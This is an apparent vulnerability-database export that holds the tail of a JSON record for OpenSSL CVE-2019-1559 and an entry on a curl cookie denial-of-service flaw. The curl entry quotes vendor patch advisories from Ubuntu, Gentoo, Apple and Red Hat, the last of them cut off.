        "title": "Centos-6-openssl-1.0.1e-58.pd1trfir",
        "trust": 0.1,
        "url": "https://github.com/daTourist/Centos-6-openssl-1.0.1e-58.pd1trfir "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/tls-attacker/TLS-Padding-Oracles "
      },
      {
        "title": "TLS-Padding-Oracles",
        "trust": 0.1,
        "url": "https://github.com/RUB-NDS/TLS-Padding-Oracles "
      },
      {
        "title": "vyger",
        "trust": 0.1,
        "url": "https://github.com/mrodden/vyger "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/vincent-deng/veracode-container-security-finding-parser "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-1559"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-956"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002098"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-203",
        "trust": 1.1
      },
      {
        "problemtype": "information leak (CWE-200) [NVD Evaluation ]",
        "trust": 0.8
      },
      {
        "problemtype": "CWE-200",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147651"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002098"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-1559"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 3.6,
        "url": "http://www.securityfocus.com/bid/107174"
      },
      {
        "trust": 2.5,
        "url": "https://access.redhat.com/errata/rhsa-2019:3931"
      },
      {
        "trust": 2.4,
        "url": "https://www.oracle.com/security-alerts/cpujan2021.html"
      },
      {
        "trust": 2.4,
        "url": "https://access.redhat.com/errata/rhsa-2019:3929"
      },
      {
        "trust": 2.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1559"
      },
      {
        "trust": 2.0,
        "url": "https://access.redhat.com/errata/rhsa-2019:2304"
      },
      {
        "trust": 1.9,
        "url": "https://www.openssl.org/news/secadv/20190226.txt"
      },
      {
        "trust": 1.9,
        "url": "https://security.gentoo.org/glsa/201903-10"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/errata/rhsa-2019:2439"
      },
      {
        "trust": 1.9,
        "url": "https://usn.ubuntu.com/3899-1/"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20190301-0001/"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20190301-0002/"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20190423-0002/"
      },
      {
        "trust": 1.8,
        "url": "https://www.tenable.com/security/tns-2019-02"
      },
      {
        "trust": 1.8,
        "url": "https://www.tenable.com/security/tns-2019-03"
      },
      {
        "trust": 1.8,
        "url": "https://www.debian.org/security/2019/dsa-4400"
      },
      {
        "trust": 1.8,
        "url": "https://www.oracle.com/security-alerts/cpujan2020.html"
      },
      {
        "trust": 1.8,
        "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
      },
      {
        "trust": 1.8,
        "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
      },
      {
        "trust": 1.8,
        "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00003.html"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2019:2437"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2019:2471"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00041.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00019.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00046.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00047.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00049.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00080.html"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4376-2/"
      },
      {
        "trust": 1.7,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10282"
      },
      {
        "trust": 1.2,
        "url": "https://support.f5.com/csp/article/k18549143"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ewc42uxl5ghtu5g77vkbf6jyuungshom/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/zbev5qgdrfuzdmnecfxusn5fmyozde4v/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/y3ivfgserazlnjck35tem2r4726xih3z/"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=e9bbefbf0f24c57645e7ad6a5a71ae649d18ac8e"
      },
      {
        "trust": 1.1,
        "url": "https://support.f5.com/csp/article/k18549143?utm_source=f5support\u0026amp%3butm_medium=rss"
      },
      {
        "trust": 0.7,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9bbefbf0f24c57645e7ad6a5a71ae649d18ac8e"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/zbev5qgdrfuzdmnecfxusn5fmyozde4v/"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/y3ivfgserazlnjck35tem2r4726xih3z/"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ewc42uxl5ghtu5g77vkbf6jyuungshom/"
      },
      {
        "trust": 0.6,
        "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory30.asc"
      },
      {
        "trust": 0.6,
        "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa44019/?l=en_us\u0026atype=sa\u0026fs=search\u0026pn=1\u0026atype=sa"
      },
      {
        "trust": 0.6,
        "url": "https://www.oracle.com/technetwork/topics/security/bulletinapr2019-5462008.html"
      },
      {
        "trust": 0.6,
        "url": "https://github.com/rub-nds/tls-padding-oracles"
      },
      {
        "trust": 0.6,
        "url": "http://openssl.org/"
      },
      {
        "trust": 0.6,
        "url": "https://support.f5.com/csp/article/k18549143?utm_source=f5support\u0026utm_medium=rss"
      },
      {
        "trust": 0.6,
        "url": "https://support.symantec.com/us/en/article.symsa1490.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1170328"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1170340"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1170334"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1170322"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1170352"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1170346"
      },
      {
        "trust": 0.6,
        "url": "https://nodejs.org/en/blog/vulnerability/february-2019-security-releases/"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20190572-1/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4212-1/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1115655"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1115649"
      },
      {
        "trust": 0.6,
        "url": "https://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/   hitachi-sec-2019-132/index.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/2016771"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/2020677"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/2027745"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1126581"
      },
      {
        "trust": 0.6,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hitachi-sec-2019-132/index.html"
      },
      {
        "trust": 0.6,
        "url": "http://www.ubuntu.com/usn/usn-3899-1"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/76438"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-tivoli-netcool-system-service-monitors-application-service-monitors-cve-2018-5407cve-2020-1967cve-2018-0734cve-2019-1563cve-2019/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4405/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1116357"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4558/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4479/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3729/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/76230"
      },
      {
        "trust": 0.6,
        "url": "https://www.oracle.com/security-alerts/cpujan2020verbose.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0032/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0487/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1115643"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/openssl-1-0-2-information-disclosure-via-0-byte-record-padding-oracle-28600"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/3517185"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1167202"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-openssl-as-used-by-ibm-qradar-siem-is-missing-a-required-cryptographic-step-cve-2019-1559/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0192/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3390.4/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssl-affects-ibm-integrated-analytics-system/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4479.2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3462/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.4083"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155415/red-hat-security-advisory-2019-3929-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6520674"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0696"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-have-been-identified-in-openssl-and-the-kernel-shipped-with-the-ds8000-hardware-management-console-hmc/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/76782"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-rackswitch-firmware-products-are-affected-by-the-following-opensll-vulnerability/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.2383/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4255/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4297/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0102/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1143442"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-in-openssh-and-openssl-shipped-with-ibm-security-access-manager-appliance-cve-2018-15473-cve-2019-1559/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1105965"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/158377/ubuntu-security-notice-usn-4376-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1106553"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-public-disclosed-vulnerability-from-openssl-affect-ibm-netezza-host-management/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/151886/slackware-security-advisory-openssl-updates.html"
      },
      {
        "trust": 0.3,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-1559"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5407"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10282"
      },
      {
        "trust": 0.1,
        "url": "https://support.f5.com/csp/article/k18549143?utm_source=f5support\u0026amp;amp;utm_medium=rss"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/203.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2019-1559"
      },
      {
        "trust": 0.1,
        "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=59697"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/policies/secpolicy.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2974891"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3888"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16881"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16881"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3888"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/openssl1.0"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1547"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1563"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4376-1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4376-2"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-10072"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-0221"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-5407"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0221"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10072"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3899-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.15"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl1.0/1.0.2n-1ubuntu6.2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl1.0/1.0.2n-1ubuntu5.3"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.7_release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0734"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-0734"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147651"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1559"
      },
      {
        "db": "PACKETSTORM",
        "id": "169635"
      },
      {
        "db": "PACKETSTORM",
        "id": "154009"
      },
      {
        "db": "PACKETSTORM",
        "id": "151918"
      },
      {
        "db": "PACKETSTORM",
        "id": "158377"
      },
      {
        "db": "PACKETSTORM",
        "id": "152084"
      },
      {
        "db": "PACKETSTORM",
        "id": "155413"
      },
      {
        "db": "PACKETSTORM",
        "id": "151885"
      },
      {
        "db": "PACKETSTORM",
        "id": "153932"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-956"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002098"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-1559"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-147651",
        "ident": null
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1559",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "169635",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154009",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "151918",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "158377",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "152084",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "155413",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "151885",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "153932",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-956",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002098",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2019-1559",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2019-02-27T00:00:00",
        "db": "VULHUB",
        "id": "VHN-147651",
        "ident": null
      },
      {
        "date": "2019-02-27T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-1559",
        "ident": null
      },
      {
        "date": "2019-02-26T12:12:12",
        "db": "PACKETSTORM",
        "id": "169635",
        "ident": null
      },
      {
        "date": "2019-08-12T17:13:13",
        "db": "PACKETSTORM",
        "id": "154009",
        "ident": null
      },
      {
        "date": "2019-03-01T14:06:40",
        "db": "PACKETSTORM",
        "id": "151918",
        "ident": null
      },
      {
        "date": "2020-07-09T18:42:27",
        "db": "PACKETSTORM",
        "id": "158377",
        "ident": null
      },
      {
        "date": "2019-03-14T16:23:47",
        "db": "PACKETSTORM",
        "id": "152084",
        "ident": null
      },
      {
        "date": "2019-11-20T20:32:22",
        "db": "PACKETSTORM",
        "id": "155413",
        "ident": null
      },
      {
        "date": "2019-02-27T19:19:00",
        "db": "PACKETSTORM",
        "id": "151885",
        "ident": null
      },
      {
        "date": "2019-08-06T21:09:19",
        "db": "PACKETSTORM",
        "id": "153932",
        "ident": null
      },
      {
        "date": "2019-02-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201902-956",
        "ident": null
      },
      {
        "date": "2019-04-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-002098",
        "ident": null
      },
      {
        "date": "2019-02-27T23:29:00.277000",
        "db": "NVD",
        "id": "CVE-2019-1559",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2022-08-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-147651",
        "ident": null
      },
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-1559",
        "ident": null
      },
      {
        "date": "2022-03-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201902-956",
        "ident": null
      },
      {
        "date": "2021-07-15T06:04:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-002098",
        "ident": null
      },
      {
        "date": "2024-11-21T04:36:48.960000",
        "db": "NVD",
        "id": "CVE-2019-1559",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "169635"
      },
      {
        "db": "PACKETSTORM",
        "id": "151885"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-956"
      }
    ],
    "trust": 0.8
  },
  "title": {
    "_id": null,
    "data": "OpenSSL\u00a0 Information Disclosure Vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002098"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-956"
      }
    ],
    "trust": 0.6
  }
}

VAR-202208-2263

Vulnerability from variot - Updated: 2026-03-09 23:13

When curl is used to retrieve and parse cookies from a HTTP(S) server, itaccepts cookies using control codes that when later are sent back to a HTTPserver might make the server return 400 responses. Effectively allowing a"sister site" to deny service to all siblings. A security vulnerability exists in curl versions 4.9 through 7.84. ========================================================================== Ubuntu Security Notice USN-5587-1 September 01, 2022

curl vulnerability

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 22.04 LTS
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS
Ubuntu 16.04 ESM
Ubuntu 14.04 ESM

Summary:

curl could be denied access to a HTTP(S) content if it recieved a specially crafted cookie.

Software Description: - curl: HTTP, HTTPS, and FTP client and client libraries

Details:

Axel Chong discovered that when curl accepted and sent back cookies containing control bytes that a HTTP(S) server might return a 400 (Bad Request Error) response. A malicious cookie host could possibly use this to cause denial-of-service.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 22.04 LTS: curl 7.81.0-1ubuntu1.4 libcurl3-gnutls 7.81.0-1ubuntu1.4 libcurl3-nss 7.81.0-1ubuntu1.4 libcurl4 7.81.0-1ubuntu1.4

Ubuntu 20.04 LTS: curl 7.68.0-1ubuntu2.13 libcurl3-gnutls 7.68.0-1ubuntu2.13 libcurl3-nss 7.68.0-1ubuntu2.13 libcurl4 7.68.0-1ubuntu2.13

Ubuntu 18.04 LTS: curl 7.58.0-2ubuntu3.20 libcurl3-gnutls 7.58.0-2ubuntu3.20 libcurl3-nss 7.58.0-2ubuntu3.20 libcurl4 7.58.0-2ubuntu3.20

Ubuntu 16.04 ESM: curl 7.47.0-1ubuntu2.19+esm5 libcurl3 7.47.0-1ubuntu2.19+esm5 libcurl3-gnutls 7.47.0-1ubuntu2.19+esm5 libcurl3-nss 7.47.0-1ubuntu2.19+esm5

Ubuntu 14.04 ESM: curl 7.35.0-1ubuntu2.20+esm12 libcurl3 7.35.0-1ubuntu2.20+esm12 libcurl3-gnutls 7.35.0-1ubuntu2.20+esm12 libcurl3-nss 7.35.0-1ubuntu2.20+esm12

In general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202212-01

                                       https://security.gentoo.org/

Severity: High Title: curl: Multiple Vulnerabilities Date: December 19, 2022 Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365 ID: 202212-01

Synopsis

Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution.

Background

A command line tool and library for transferring data with URLs.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 net-misc/curl < 7.86.0 >= 7.86.0

Description

Multiple vulnerabilities have been discovered in curl. Please review the CVE identifiers referenced below for details.

Impact

Please review the referenced CVE identifiers for details.

Workaround

There is no known workaround at this time.

Resolution

All curl users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"

References

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/202212-01

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

APPLE-SA-2023-01-23-5 macOS Monterey 12.6.3

macOS Monterey 12.6.3 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213604.

AppleMobileFileIntegrity Available for: macOS Monterey Impact: An app may be able to access user-sensitive data Description: This issue was addressed by enabling hardened runtime. CVE-2023-23499: Wojciech Reguła (@_r3ggi) of SecuRing (wojciechregula.blog)

curl Available for: macOS Monterey Impact: Multiple issues in curl Description: Multiple issues were addressed by updating to curl version 7.86.0. CVE-2022-42915 CVE-2022-42916 CVE-2022-32221 CVE-2022-35260

curl Available for: macOS Monterey Impact: Multiple issues in curl Description: Multiple issues were addressed by updating to curl version 7.85.0. CVE-2022-35252

dcerpc Available for: macOS Monterey Impact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution Description: A buffer overflow issue was addressed with improved memory handling. CVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco Talos

DiskArbitration Available for: macOS Monterey Impact: An encrypted volume may be unmounted and remounted by a different user without prompting for the password Description: A logic issue was addressed with improved state management. CVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)

DriverKit Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges Description: A type confusion issue was addressed with improved checks. CVE-2022-32915: Tommy Muir (@Muirey03)

Intel Graphics Driver Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved bounds checks. CVE-2023-23507: an anonymous researcher

Kernel Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2023-23504: Adam Doupé of ASU SEFCOM

Kernel Available for: macOS Monterey Impact: An app may be able to determine kernel memory layout Description: An information disclosure issue was addressed by removing the vulnerable code. CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. (@starlabs_sg)

PackageKit Available for: macOS Monterey Impact: An app may be able to gain root privileges Description: A logic issue was addressed with improved state management. CVE-2023-23497: Mickey Jin (@patch1t)

Screen Time Available for: macOS Monterey Impact: An app may be able to access information about a user’s contacts Description: A privacy issue was addressed with improved private data redaction for log entries. CVE-2023-23505: Wojciech Regula of SecuRing (wojciechregula.blog)

Weather Available for: macOS Monterey Impact: An app may be able to bypass Privacy preferences Description: The issue was addressed with improved memory handling. CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an anonymous researcher

WebKit Available for: macOS Monterey Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: The issue was addressed with improved memory handling. WebKit Bugzilla: 248268 CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park (@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung), JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE WebKit Bugzilla: 248268 CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park (@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung), JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE

Windows Installer Available for: macOS Monterey Impact: An app may be able to bypass Privacy preferences Description: The issue was addressed with improved memory handling. CVE-2023-23508: Mickey Jin (@patch1t)

Additional recognition

Kernel We would like to acknowledge Nick Stenning of Replicate for their assistance.

macOS Monterey 12.6.3 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0428.json

Red Hat officially shut down their mailing list notifications October 10, 2023. Due to this, Packet Storm has recreated the below data as a reference point to raise awareness. It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment. Summary:

Red Hat Advanced Cluster Management for Kubernetes 2.6.6 General Availability release images, which fix security issues and update container images. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.6.6 images

This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/

Security Fix(es): * CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command * CVE-2023-32314 vm2: Sandbox Escape * CVE-2023-32313 vm2: Inspect Manipulation

Solution:

